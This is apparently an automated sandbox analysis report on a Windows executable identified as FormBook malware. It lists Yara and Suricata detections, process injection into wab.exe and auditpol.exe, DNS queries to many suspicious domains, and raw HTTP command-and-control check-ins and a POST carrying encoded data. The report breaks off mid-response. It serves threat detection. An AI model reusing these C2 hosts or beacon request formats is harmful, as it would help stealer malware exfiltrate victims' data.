Windows Analysis Report
RN# D7521-RN-00353 REV-2.exe

AV Detection

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: RN# D7521-RN-00353 REV-2.exe

Joe Sandbox ML: detected

Exploits

Source: Yara match	File source: 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796, type: MEMORYSTR

Compliance

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uIklAoJgpkP.exe, 00000009.00000002.4128841533.000000000085E000.00000002.00000001.01000000.00000008.sdmp, uIklAoJgpkP.exe, 0000000B.00000000.2079950190.000000000085E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: auditpol.pdbGCTL source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbMicrosoft.VisualBasic.ni.dllMZ source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: auditpol.pdb source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF40C.tmp.dmp.5.dr

Spreading

Source: C:\Windows\SysWOW64\auditpol.exe

Code function: 10_2_029BC2D0 FindFirstFileW,FindNextFileW,FindClose,

10_2_029BC2D0

Software Vulnerabilities

Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then xor eax, eax		10_2_029A9B30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then pop edi		10_2_029ADDE5
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_034704DE

Networking

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 44.213.25.70:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49767 -> 103.255.237.233:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49779 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49775 -> 221.121.144.149:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49783 -> 50.3.111.89:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 147.92.40.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49791 -> 13.248.252.114:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 203.161.43.245:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49771 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49787 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49792 -> 147.92.40.174:80

Source:	DNS query: www.languyenthuyduyen.xyz
Source:	DNS query: www.13149200.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.mudanya-nakliyat.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 44.213.25.70 44.213.25.70

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gubb/?sL9tFJ=oPjgdHtcRwBFU1aA9ZOuj8Coc4bNSQhA+Z/l/vbVu6gyzA9FNnh3E8/0K3U760fP/mUdrl6a4REPJue/mxKU4Ri2QVEaCVjMmKnjA5rRPYPki2Nnm5W7gsk=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.stayup.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /s9un/?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.luxe.guruConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo+nz+dFs7xbp1eoNPi6Q2eN5D+KpvM2vqKME65A47EEAJHO8M7tvWjwt8QkxqADfIieF9YUtvuZ7jYHQQX8NIphqxPsvx6gn4=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pt4m/?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.theclydefund.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dt20/?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.crowsecurity.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ctkk/?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028ENKix9xnpjaLK+rUCaExClfx8VOmsMg4q/F6QibXlvsba63eJfmkGHAexdCL7DaV+OKMxuUWRxpipB6VVsrtbE=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.languyenthuyduyen.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /oigd/?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.comrade.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhewpD/mY7kOCunrzTJsDmzjVkamuOhh+qvjCKHphba70ug78hyc7mtXPvEWT9U=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.inf30027group23.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /51hg/?sL9tFJ=lzb8Q+1ZkRYL+ndO3j5PVMDGwV51DFPdeivGsnVW/hUSyu5WpgLMVT/2ZD9ppe7fxW6d+w7xhCgyU1oioUeFR6Wo19Fxr1GQyE0P1h5QkDnbWNzfENeGUo8=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mudanya-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m4jf/?sL9tFJ=0TgQC1Luv9cVf1TCKLCdjgzht3H610PutW8Pu5k4ZnbC5HUSntLYriRCMSQSDyNJ5vKB93oSdDtzFOKGboJdJ4jxO8kQzN3YuKmjgHKVRyz7ENXIVwzZU4M=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.solargridxx.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /87wq/?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.airtech365.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /uaxy/?sL9tFJ=jCoxKbndYFu2rVUc2fNf8o1DCs+xE29ELzrRYPIrNX671AzrKUsZ0ekHPlezV1wvKt2FOH2y7yDiMlHHG1j7pH9tJsj87FCdBv0goUpKNozmpGwQ2nrx39s=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.x100.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.63582.photo
Source: global traffic	DNS traffic detected: DNS query: www.bonusgame2024.online
Source: global traffic	DNS traffic detected: DNS query: www.stayup.top
Source: global traffic	DNS traffic detected: DNS query: www.luxe.guru
Source: global traffic	DNS traffic detected: DNS query: www.newdaydawning.net
Source: global traffic	DNS traffic detected: DNS query: www.theclydefund.info
Source: global traffic	DNS traffic detected: DNS query: www.crowsecurity.cloud
Source: global traffic	DNS traffic detected: DNS query: www.languyenthuyduyen.xyz
Source: global traffic	DNS traffic detected: DNS query: www.comrade.lol
Source: global traffic	DNS traffic detected: DNS query: www.13149200.xyz
Source: global traffic	DNS traffic detected: DNS query: www.inf30027group23.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mudanya-nakliyat.xyz
Source: global traffic	DNS traffic detected: DNS query: www.solargridxx.shop
Source: global traffic	DNS traffic detected: DNS query: www.popin.space
Source: global traffic	DNS traffic detected: DNS query: www.airtech365.net
Source: global traffic	DNS traffic detected: DNS query: www.x100.shop

Source: unknown

HTTP traffic detected: POST /gubb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.stayup.topContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeCache-Control: no-cacheOrigin: http://www.stayup.topReferer: http://www.stayup.top/gubb/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 73 4c 39 74 46 4a 3d 6c 4e 4c 41 65 32 6c 30 51 6b 70 62 42 30 76 6b 36 72 79 46 36 4d 2b 6f 64 4e 4f 48 66 69 35 64 38 6f 76 37 37 38 79 53 6b 73 51 63 67 68 5a 31 44 46 5a 78 4e 4d 7a 4a 4e 45 73 59 78 6a 57 55 6b 46 35 44 71 31 61 4d 2b 68 4a 66 44 4e 53 66 2f 43 57 69 6d 51 36 44 58 44 4a 55 4d 53 48 79 70 61 44 65 4b 73 47 34 4f 35 76 57 6d 31 35 6d 7a 4c 69 71 39 4d 6f 55 37 66 71 38 57 53 42 42 4b 49 47 69 4c 35 46 6d 71 76 47 79 35 35 43 6b 2f 4f 37 69 49 69 44 31 73 51 6b 71 51 4e 55 4a 4e 69 47 7a 6e 41 47 72 38 6b 77 43 56 56 57 4c 68 39 72 4b 4f 54 64 4e 34 6e 48 74 37 4e 66 79 65 67 3d 3d Data Ascii: sL9tFJ=lNLAe2l0QkpbB0vk6ryF6M+odNOHfi5d8ov778ySksQcghZ1DFZxNMzJNEsYxjWUkF5Dq1aM+hJfDNSf/CWimQ6DXDJUMSHypaDeKsG4O5vWm15mzLiq9MoU7fq8WSBBKIGiL5FmqvGy55Ck/O7iIiD1sQkqQNUJNiGznAGr8kwCVVWLh9rKOTdN4nHt7Nfyeg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was 